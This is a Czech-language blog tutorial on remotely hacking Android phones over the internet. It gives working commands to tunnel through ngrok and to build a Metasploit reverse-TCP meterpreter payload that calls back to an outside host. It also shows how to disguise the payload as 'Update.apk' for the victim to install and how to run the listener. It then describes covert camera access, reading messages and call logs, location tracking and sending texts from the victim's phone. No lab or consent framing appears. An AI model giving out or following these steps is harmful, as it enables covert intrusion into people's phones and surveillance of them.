Hacking Android Device [Remotely]

Hacking over WAN

Můžete se podívat na můj videonávod na youtube zde:
https://youtu.be/Bbp-AcejtHI

Obvykle ve WAN, za prvé, musíte mít statickou IP/Hostname a za druhé, musíte udělat Port Forwarding umožnit přenos provozu, a všichni víme, že oba jsou tak obtížné v reálném čase, protože máme omezený přístup k portům v síti.

Takže, co uděláme v tomto scénáři, nastavíme bezpečný tunel pomocí Ngrok.

Ngrok je tunelovací reverzní proxy systém, který vytváří tunely z veřejného koncového bodu, tj. internetu, do lokálně běžící síťové služby. To nám může pomoci vytvořit veřejnou adresu URL HTTP/HTTPS pro webovou stránku spuštěnou lokálně v našem počítači. Při použití Ngroku nemusíme provádět žádné přesměrování portů a naše síťová služba se nakonec vystaví internetu pomocí tunelování TCP.

Pokračujte podle následujících kroků:

Krok1: Registrace účtu Ngrok ke stažení.

Nejprve se musíte zaregistrovat k účtu Ngrok, poté vás to vyzve k otevření okna pro stahování.

Přihlašovací okno Ngrok

Po přihlášení můžete stáhnout Ngrok pro váš systém Linux.

Stažený soubor jednoduše rozbalte.

Krok2: Připojení účtu

Spuštěním tohoto příkazu přidáte svůj autentizační token do výchozího konfiguračního souboru ngrok.yml. Tím získáte přístup k více funkcím a delší době relace. (Musíte sem zkopírovat a vložit svůj vlastní token poskytnutý na domovské obrazovce aplikace ngrok po přihlášení)

./ngrok authtoken <vašeho tokenu>

Nyní jste připraveni používat tento nástroj. Otevřete terminál, přesuňte se do adresáře, kam jste rozbalili nástroj Ngrock, a zadejte:

./ngrok tcp

zvolte číslo portu, na který chcete navázat spojení(zde jsem jako číslo portu zvolil 5555). A po stisknutí enteru se zobrazí obrazovka něco jako toto:

Předávání zde určuje TCP tunel, který ngrok vytvořil. Spojení se navázalo na localhost na portu 5555. Nyní musíme vygenerovat škodlivý payload pomocí msfvenom.

Krok3: Generování payloadu

To můžete provést tak, že otevřete nový terminál v počítači Kali Linux a zadáte následující kód.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Ale nezapomeňte, že tentokrát jde o trochu jiný útok, než který jsme prováděli v LAN. Zde místo IP adresy budeme muset zadat odkaz Forwarding poskytnutý v ngroku (2.tcp.ngrok.io). A číslo portu bude 15787. Nezapomeňte, že je důležité zadat stejné číslo portu, které poskytuje Ngrok při přesměrování portů.

Poznámka: Pokud zadání IP adresy jako 2.tcp.ngrok.io nefunguje, můžete ji nahradit IP adresou, kterou získáte pomocí příkazu „ping“.
Otevřete terminál a zadejte ping 2.tcp.ngrok.io a stiskněte enter. Získáte IP adresu, kterou musíte vložit na místo LHOST.

Zde jsem jako název souboru pro náš náklad použil „Update.apk“. Tento soubor se má nainstalovat do zařízení Android našeho cíle. Před instalací tohoto souboru však musíme nastavit náš posluchač. Za tímto účelem postupujte podle kroku 4.

Krok4: Nastavení posluchače

Otevřete terminál a načtěte konzolu Metasploit zadáním: msfconsole
Po jejím načtení (po několika sekundách) načtěte multi-handler exploitu zadáním:

use exploit/multi/handler

Nyní nastavte reverzní payload zadáním:

set payload android/meterpreter/reverse_tcp

Nastavte LHOST jako 0.0.0.0 a LPORT jako 5555
(Číslo portu by mělo být stejné jako číslo portu, které bylo použito pro navázání spojení v ngroku)

set LHOST 0.0.0.0
set LPORT 5555

Nakonec zadejte exploit pro spuštění posluchače.

Režim naslouchání je zapnutý

Krok5: Instalace souboru Malicious Update.apk do cílového zařízení

Nechte oběť nainstalovat aplikaci a spusťte ji hned po instalaci. Když se oběť dotkne možnosti otevřít aplikaci, získáte přístup ke všem funkcím zařízení se systémem Android. Po otevření aplikace se však na obrazovce zařízení nic nezobrazí.

Po zneužití

Zadejte nápovědu a zobrazte různé možnosti, které můžete použít k provádění různých úkolů na zařízení oběti.
Můžete získat přístup k jejímu fotoaparátu a pořídit fotografii, aniž byste ji na to upozornili. Můžete také kontrolovat jejich zprávy, protokoly hovorů a ukládat je do systému.
Také můžete zobrazit a otevřít jakoukoli aplikaci nainstalovanou v jejich zařízení. Můžete dokonce získat souřadnice aktuální polohy uživatele.
Prostřednictvím jejich zařízení můžete také odesílat zprávy na libovolné kontaktní číslo.

.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna.